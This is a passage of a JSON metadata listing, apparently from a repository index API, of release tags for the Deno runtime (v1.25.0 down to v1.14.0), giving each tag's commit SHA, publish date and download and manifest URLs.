.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0"